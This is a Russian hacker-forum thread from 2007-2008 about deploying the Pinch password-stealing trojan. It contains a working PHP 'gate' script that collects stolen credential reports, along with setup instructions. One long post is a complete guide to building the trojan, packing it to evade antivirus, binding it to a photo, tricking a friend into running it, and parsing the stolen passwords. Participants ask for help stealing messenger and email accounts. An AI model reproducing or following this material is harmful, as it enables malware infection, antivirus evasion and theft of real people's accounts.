Про пинч
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Про пинч - 2007-12-23 14:31:52.316666
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
Ребята не ругайтесь если подобные вопросы уже существовали и не раз но хочется узнать:
1)Зависит ли отправка паролей от smtp сервера?(тоесть его типа)
2)Зависит ли от типа OS?у меня стоит sp2 отключил антивирь настроил на мыло которе создал на mail.by но ничё не действует
3)какое время надо пинчу для находки паролей и их отправки?
4)Если пинч не находит паролей он присылает пустой отчет или нет?
Заранее скажу что пользуюсь Pinch 3 Builder (public version)..
|
|
|
|
|
RE: Про пинч - 2007-12-23 18:52:56.713333
|
|
|
Diznt
Сообщений: 27
Оценки: 0
Присоединился: 2007-12-17 16:28:51.766666
|
я пожалуй отвечу
1- Я думаю что Нет
2- Нет
3- Это смотря что стоит на компе жертвы ( если антивирсу то запалит а если фаер встроеный то не передаст пароли )
4- Он полюбе присылает от4ет даже если на компе паролей нету
|
|
|
|
|
RE: Про пинч - 2007-12-23 19:01:55.233333
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
5. Юзай гейт и не мучайся.
|
|
|
|
|
RE: Про пинч - 2007-12-23 22:21:53.233333
|
|
|
Dr.KoD
Сообщений: 59
Оценки: 0
Присоединился: 2007-09-29 16:45:59.820000
|
Пинч сейчас не отправляет пароли на мыло, на каком бы ты севаке не зарегал себе мыло, юзай гейт как тебе уже предложили, да и вот тебе мой совет тесть пинч не на своей родной оси, а на виртуальной.
Со временем бывает поразному бывает сразу приходит отчет, бывает ваще ничего не приходит.
|
|
|
|
|
RE: Про пинч - 2007-12-24 14:55:56.220000
|
|
|
Script34
Сообщений: 16
Оценки: 0
Присоединился: 2007-12-17 12:47:31.510000
|
Dr.KoD верно отметил. С отчётом на мыло сейчас уже можно не заморачиваться. Раньше где то год назад всё было ништяк. Сейчас видно отчёты не даёт принять сетевой антивир. Так что юзай гейт;)
|
|
|
|
|
RE: Про пинч - 2007-12-24 19:29:56.106666
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
Приобрёл гейт и все что с ним связанно))проверять пока не стал нету времени…Впринципе всуть вникнул каким образом это все делается но почему вышли из употребления скрипты mail.php или mail2.php которые у меня имелись раньше в архиве..с пинчем…и нужно ли производить вручную какието настройки в файле gate.php?
|
|
|
|
|
RE: Про пинч - 2007-12-29 17:12:13.216666
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
так в этом вопросе всё снято))идём далее создал акаунт на holm.ru зашёл на фтп залил туда че надо и поставил нужные права тест трояна и нефига ….я поставил так чтоб троян оставлял файл с пассами на фтп..у кого нибудь вообще действует троян на Holm.ru ? мне просто знать это руки кривые или сайт уже не тот…
|
|
|
|
|
RE: Про пинч - 2007-12-29 17:25:47.863333
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Юзай обычный гейт.
<?
$ip = getenv("REMOTE_ADDR");
$msg = str_replace(" ", "+", $_GET['c']);
$filename = "reps/_rep-".date('H_i-d.m.Y', time() + 3600 * 6)."_".rand(0,9).rand(0,9).rand(0,9).".rep";
$fp = fopen($filename, 'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
?>
<title>ret_ok</title>
И незабудь на папку reps поставить права - 0777
|
|
|
|
|
RE: Про пинч - 2007-12-29 17:27:48.893333
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
я итак гейтом пользовался.вот кстате набор в архиве с гейтом последние выпуски http://slil.ru/25302365
|
|
|
|
|
RE: Про пинч - 2007-12-29 17:41:16.180000
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Админку для пинча можешь взять из моего набора. Выкладывал неподалеку на форуме (3.01, гейт юзать другой)
|
|
|
|
|
RE: Про пинч - 2007-12-29 22:02:35.480000
|
|
|
PeGаs
Сообщений: 3
Оценки: 0
Присоединился: 2007-12-29 21:31:27.813333
|
Здаров извините за глупый вопрос а асю можно взломать
|
|
|
|
|
RE: Про пинч - 2007-12-30 12:55:29.230000
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
ret_okquote:
quote:
ORIGINAL: blаcksun
Юзай обычный гейт.
<?
$ip = getenv("REMOTE_ADDR");
$msg = str_replace(" ", "+", $_GET['c']);
$filename = "reps/_rep-".date('H_i-d.m.Y', time() + 3600 * 6)."_".rand(0,9).rand(0,9).rand(0,9).".rep";
$fp = fopen($filename, 'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
?>
<title>ret_ok</title>
И незабудь на папку reps поставить права - 0777
это и есть гейт 3.01 ??
|
|
|
|
|
RE: Про пинч - 2007-12-30 12:57:45.450000
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Это гейт для <= 3.0
|
|
|
|
|
RE: Про пинч - 2007-12-30 13:16:29.490000
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
php скриптам нужно ставить права 775??
и ещё вопрос я удалил старую папку www с фтп и загрузил ту которая в пинче 3.01 но почемуто при заходе на сайт Index.php не действует все равно идет переадресация на какойто сайт а в пинче 3.01 я так понял должно выводится redirect_by_error в чем дело?
|
|
|
|
|
RE: Про пинч - 2007-12-30 15:21:25.033333
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
quote:
ORIGINAL: nevrotkampot
php скриптам нужно ставить права 775??
и ещё вопрос я удалил старую папку www с фтп и загрузил ту которая в пинче 3.01 но почемуто при заходе на сайт Index.php не действует все равно идет переадресация на какойто сайт а в пинче 3.01 я так понял должно выводится redirect_by_error в чем дело?
Дело в кривой ДНК или кривых рУках …
|
|
|
|
|
RE: Про пинч - 2007-12-30 22:02:45.786666
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
Ну если без приколов обьяснить то нужно как я понял:
1)зарегится на Holm.ru
2)открыть фтп залить туда папку www предварительно удалив старую папку www
3)поставить всем папка права 777 а php скриптам 775
тестить это дело…
если что не так то обьясни по пунктам буду жутко благодарен!
|
|
|
|
|
RE: Про пинч - 2008-01-04 06:33:48.003333
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Вроде все-зарегился на holm.ru, скачал эту заливалку на ftp, скачал пинч, залил на сервак папку gate( в ней *php файло разное и папка reps) поправьте если не так; создал пинч, но отчеты не приходят((( Граждане, хакеры, может я не тот путь пишу или еще че… те кто делал хостинг на holm.ru - скажите какой путь к папке.я 2 ночи сидел все делал-хоть сдохни, но ничего не приходит.Антивири фаерволы отрубил.Помогите пожалуйста-у меня уже сил нет.Можно для любого пинча от 2.58 до 2.99. 3.01 нигде не нашел.Заранее огромное спасибо.
|
|
|
|
|
RE: Про пинч - 2008-01-04 06:55:22.280000
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Блин ну хоть видео снимай .. :)
1. Заливаем на фтп папку gаte
2. (!) ставим на папку reps права 0777
3. на скрипты ставим права 0755
4. Настройки:
– Хост: www.site.com
– Путь до скрипта: /gate/gate.php
– Остальные настройки можно не трогать.
Вот и все, че сложного то?!
|
|
|
|
|
RE: Про пинч - 2008-01-04 19:02:55.120000
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Блин…все сделалл как ты сказал….пофиг((( Может хост паленый, если через ftp заходить-то все ок, а если через www, то пофиг-перекидывает с моего адреса на сайт знакомств(((слушай, подскажи какой нибудь другой халявный хостинг, только русский.ПЛЗ.Огромное спасибо
|
|
|
|
|
RE: Про пинч - 2008-01-04 19:04:25.183333
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Только права помойму не 0777 и 0755, 777 и 755.Поправь если ошибаюсь
|
|
|
|
|
RE: Про пинч - 2008-01-05 02:06:02.713333
|
|
|
Nazikk
Сообщений: 2
Оценки: 0
Присоединился: 2008-01-05 01:49:29.220000
|
Народ….кто может нормало напшеты функцыи пинча_гате
ОЧень прошу…
Кто может поетапно опешыте как им пользватся!!!
|
|
|
|
|
RE: Про пинч - 2008-01-05 02:07:03.820000
|
|
|
Nazikk
Сообщений: 2
Оценки: 0
Присоединился: 2008-01-05 01:49:29.220000
|
blаcksun
постучи в асю…)))пли!
407740093
|
|
|
|
|
RE: Про пинч - 2008-01-05 07:24:00.366666
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Убейтесь :(
|
|
|
|
|
RE: Про пинч - 2008-01-05 09:44:45.426666
|
|
|
dflbkf
Сообщений: 657
Оценки: 0
Присоединился: 2007-10-30 14:05:19.483333
|
quote:
Кто может поетапно опешыте как им пользватся!!!
Скачиваем пинч3 Распаковываем архив, пасс pinch. Там нам для начала нужен только один файл: pinch3 Builder.exe Тут же антивирь выдаёт нам сообщение что файл такой-сякой, заражён вирусом. Ложь и клевета, вырубаем антивирь и продолжаем работать. Вот файл запущен. Теперь нужно ввести данные для отправки отчёта с паролями. Я советую создать на майл.ру какое-нибудь левое мыло и его вписать в поле e-mail в графе sender. Создал? Вписывай! SMTP Server можно не трогать, если мыло на майле-то он и будет smtp.mail.ru Теперь поле User. Туда вписываем имя нашего ящика без указания домена (для "мой_левый_ящик@mail.ru" мой_левый_ящик). В поле Password вводим пасс, который мы поставили на этом ящике. Почти готово, теперь Reciever. E-mail-сюда пишем наше мыло на которое нам будет приходить отчёт. Также ниже в поля Subject и file name вписываем тему, под которой мы получим письмо и название файла с зашифрованными пассами. Тут всё зависит только от твоей фантазии, но рекомендую юзать имена, написанные англ. буквами без пробелов. Всё, первоначальная настройка закончена, теперь жмём build. Показываем, куда сохраняем файл и его название. Троян сделан!
Но вот ведь незадача-наш троян палится антивирем! Часто на этом весь взлом и заканчивается, но это не тот случай! Мы идём сюда, скачиваем архив(405КБ), распаковываем, там нам нужен файл с названием RLPack.exe (распаковать надо весь архив, а не один этот файл!) Запускаем. В появившемся окошке мы выбираем в правом нижнем углу compression: aPLIB 0.43 и ставим все галки в левом нижнем углу(там где options). Нажимаем на кнопку Browse и выбираем там путь к нашему собственноручно склёпаному пинчу. Всё, теперь жмём заветную кнопочку pack! Проверяем наш троян-вирусов не найдено, размер уменьшился до 30КБ! (тут возможны нюансы, я проверял на каспере, он ничего не выдавал). На радостях открываем банку пива/колы.
Теперь дело за малым-подкинуть наше творение своему «другу». Скажи ему что это… это…. Ну всё что хочешь скажи! Если твой друг-не совсем ламер и запалит что расширение exe то сделай в беседе упор на то, что вирусов там нет (типа Естественно после открытия у него на компе ничего не произойдёт, никакого ни рисунка, ничего не запустится(кроме пинча в скрытом режиме который отошлёт отчёт на наше мыло), и он может у тебя спросить что это за лажа. Тут можно ответить что типа ща проверю и другой пришлю, это если конечно ты хочешь продолжить с ним беседу. Если тебе нужны только его пассы-скажи что тебе надо идти куда-нить. Уходишь, только вот он больше своих аси и мыла не увидит!
И вот у нас есть отчёт. Приступаем к самому интересному-просмотру пассов. Для начала забираем письмо с прикреплённым файлом *.bin. Его сохраняем у себя. Теперь из того же архива из которого достали pinch3_builder достаём файлик parser2.exe Запускаем. Теперь просто перетаскиваем наш файл с зашифрованными отчётами. Хлоп-появилась яркая чёрная строчка. Кликаем по ней и слева внизу мы можем просматривать всю инфу о нашей жертве, которую выцепил троян.
А теперь небольшой ЧаВо:
В: Мне не пришло отчёта… О: Тут несколько вариантов:
1)Кривые руки
2)Файрвол/антивирь, который заблокировал трою сетевую активность
В: Я запустил пинч у себя на компе, как мне его теперь удалить?
О: Его можно не удалять. В автозапуск он не прописывается, просто перезагрузи комп!
В: Мне постоянно приходят отчёты… Достали уже! Как прекратить их отправку?
О: Они приходят либо если пинч в автозапуске либо если юзер постоянно запускет его. Вот у меня был такой случай: я склеил пинча с фоткой (как это сделать так чтобы ничего не палилось расскажу потом), фотка была достаточно красивой девушки. Подкинул это всё ламаку. Он запустил, но меня ждало разочарование: пассов там особо и не было(почему так-читай дальше). НО! Он зараза такая на эту грёбаную фотку начал дрочить! Он на неё по нескольку раз за вечер точит свой агрегат а меня отчётами забрасывает! Каждое открытие «фотки»-ещё одно ненужное письмо в ящике. Тут выход такой: просто сменить пасс на том левом мыле, с которого пинч шлёт отчёты. Тогда на компе ламака троян останется, но он хотя бы отчёт отправить не сможет.
В: Там в отчёте паролей нету…
О: Такое может быть если наш ламак не поставил пасс на сохранение и каждый раз его набирает руками или если прога новая (напрмер от квипа билд 8010 пассы никогда ещё этим не приходили.)
В: А как склеить пинч с фоткой или ещё чем-нибудь?
О: Для этого нужен так называемый джойнер. тут можно взять небольшой архив (400КБ) с паблик джойнерами(пасс на архив hackzona.ru). Они все палятся. Чтобы сделать непалимый файл, используем такую систему: сделали троян-закриптовали, запустили джойнер-сделали файл-закриптовали. Должно заткнуть антивирь. Но т.к криптуем несколько раз, настоятельно рекомендую проверить на себе работоспособность. Как пользоваться джойнерами я здесь описывать не буду, можно ведь иногда и немного подумать Не забывай, что у склееного файла расширени будет exe.
В: Чем распаковать архивы???
О: Они запакован 7zip, лучший архиватор имхо, распаковать его можно Winrar, 7zip и totalCommander (для тотал коммандера нужен плагин). Наверняка есть и ещё архиваторы, но это те которыми я пользовался. И напоследок: НЕ посылай закриптованый троян на вирус тотал и прочие онлайновые проверки на вирусы! Если так будешь делать, этот криптор оч. скоро спалится! И не надо после развода 2-х ламаков именовать себя Хакером! То, что описано в этой статье-это каждый может ну или почти каждый! Не бойся экспериментировать! Ищи новые методы криптовки, ставь/снимай галки, только потом на себе на работоспособность проверяй
|
|
|
|
|
RE: Про пинч - 2008-01-05 13:48:43.536666
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Я смотрю ты статейку какую-то раннюю сюда переписал:) Почтовый антивирус любого почтового сервера блокирует твой бинар, даже не пустив его еще во входящие.С почтовым пинчем пора заканчивать….а жаль… с ним было проще, чем с гейтовым…
|
|
|
|
|
RE: Про пинч - 2008-01-05 14:27:37.613333
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
и правда лучше б про веб отчёты нормально описал…
|
|
|
|
|
RE: Про пинч - 2008-01-05 19:06:47.433333
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Ага…эти почтовые отчеты давно отошли в мир иной)))Люди, если есть кто-опишите пограммотней как с гейтом работать.Я не понимаю это:
1) Гейт кривой
2)хост паленый
3)Пинч не доделанный - старой версии
4) Или все же это у меня руки кривые)))
Кому не лень - отпишите.Помогите, ведь не один я такой)) Или сами проверьте что здесь не так.Мне кажется хост (holm.ru) не кажет отчеты.
|
|
|
|
|
RE: Про пинч - 2008-01-06 23:13:10.780000
|
|
|
Devisible
Сообщений: 49
Оценки: 0
Присоединился: 2008-01-02 10:24:35.340000
|
Pinch дерьмо!!
|
|
|
|
|
RE: Про пинч - 2008-01-06 23:18:11.423333
|
|
|
Devisible
Сообщений: 49
Оценки: 0
Присоединился: 2008-01-02 10:24:35.340000
|
Alewka
quote:
Ага…эти почтовые отчеты давно отошли в мир иной)))Люди, если есть кто-опишите пограммотней как с гейтом работать.Я не понимаю это:
1) Гейт кривой
2)хост паленый
3)Пинч не доделанный - старой версии
4) Или все же это у меня руки кривые)))
Кому не лень - отпишите.Помогите, ведь не один я такой)) Или сами проверьте что здесь не так.Мне кажется хост (holm.ru) не кажет отчеты.
Ты ваще прочел что здесь написано?
18 пост - ЧИТАЛ?
Alewka Скорее всего вариант 4
quote:
4) Или все же это у меня руки кривые)))
|
|
|
|
|
RE: Про пинч - 2008-01-07 00:53:37.086666
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Я читал 18 пост. Не дурак. Но не пашет.Хоть убейся.Сам попробуй.Создай хост на холм.ру, скомпилируй пинча любой версии(допустим 3) и залей его по фтп(выставь все права и.т.д.) Выруби на компе антивирь и попробуй запустить пинч.Ага….что отчеты не пришли? Не один я такой-пойми!!!!!Люди - скажи те где отчеты то смотреть на фтп или на www??!!!Без обид, Devisible, но если ты такой умный, то скажи!!!!!
|
|
|
|
|
RE: Про пинч - 2008-01-07 00:56:50.760000
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Пинч дерьмо!!!Так скажи где взять нормального!!Мы ведь на этом сайте не для того, чтоб обсуждать кто какой ламер, а для того что делиться информацией!!!!!!Ну так скажи где пинча нормального взять, чтоб аккаунты от QIP и аськи 6 варовал!!!!С уважение, Alewk@!!!
|
|
|
|
|
RE: Про пинч - 2008-01-08 14:31:06.513333
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
quote:
3 Распаковы quote:
ORIGINAL: blаcksun
Убейтесь :(
блэксан у меня встречный вопрос у тебя то хоть пашет у самого??
|
|
|
|
|
RE: Про пинч - 2008-01-08 14:35:57.796666
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
quote:
ORIGINAL: nevrotkampot
quote:
3 Распаковы quote:
ORIGINAL: blаcksun
Убейтесь :(
блэксан у меня встречный вопрос у тебя то хоть пашет у самого??
У меня все пашет.
|
|
|
|
|
RE: Про пинч - 2008-01-08 16:03:45.360000
|
|
|
nevrotkampot
Сообщений: 114
Оценки: 0
Присоединился: 2007-11-18 14:22:48.083333
|
Позволь узнать каким хостингом ты пользуешься
|
|
|
|
|
RE: Про пинч - 2008-01-08 20:16:02.060000
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Во-во….у меня лично вообще не пашет!!!Какой хостинг??!!! Я на holm.ru!!
|
|
|
|
|
RE: Про пинч - 2008-01-08 23:47:10.610000
|
|
|
YunArIs
Сообщений: 83
Оценки: 0
Присоединился: 2006-12-07 20:18:09.843333
|
знаю сервер где пинч на мыле пашет нормально, уже пол года как его нашол и пол года работает на ура-даже лудше в свои времена маил ру
|
|
|
|
|
RE: Про пинч - 2008-01-08 23:51:15.970000
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Слушай - может скинешь ссылочку сайта где пинч почтовый нормально пашет??!!!
|
|
|
|
|
RE: Про пинч - 2008-01-08 23:52:23.890000
|
|
|
YunArIs
Сообщений: 83
Оценки: 0
Присоединился: 2006-12-07 20:18:09.843333
|
стучи 75947676
|
|
|
|
|
RE: Про пинч - 2008-01-13 08:53:34.656666
|
|
|
X ZolDen
Сообщений: 34
Оценки: 0
Присоединился: 2008-01-12 16:44:02.603333
|
Есть видео как Pinch 3 … пользаваться если есть киньте плиз!
|
|
|
|
|
RE: Про пинч - 2008-01-13 18:23:33.413333
|
|
|
Alewka
Сообщений: 111
Оценки: 0
Присоединился: 2007-12-30 00:47:06.136666
|
Есть видео как Xinch пользоваться.Это почти тоже самое!!
|
|
|
|
|
|
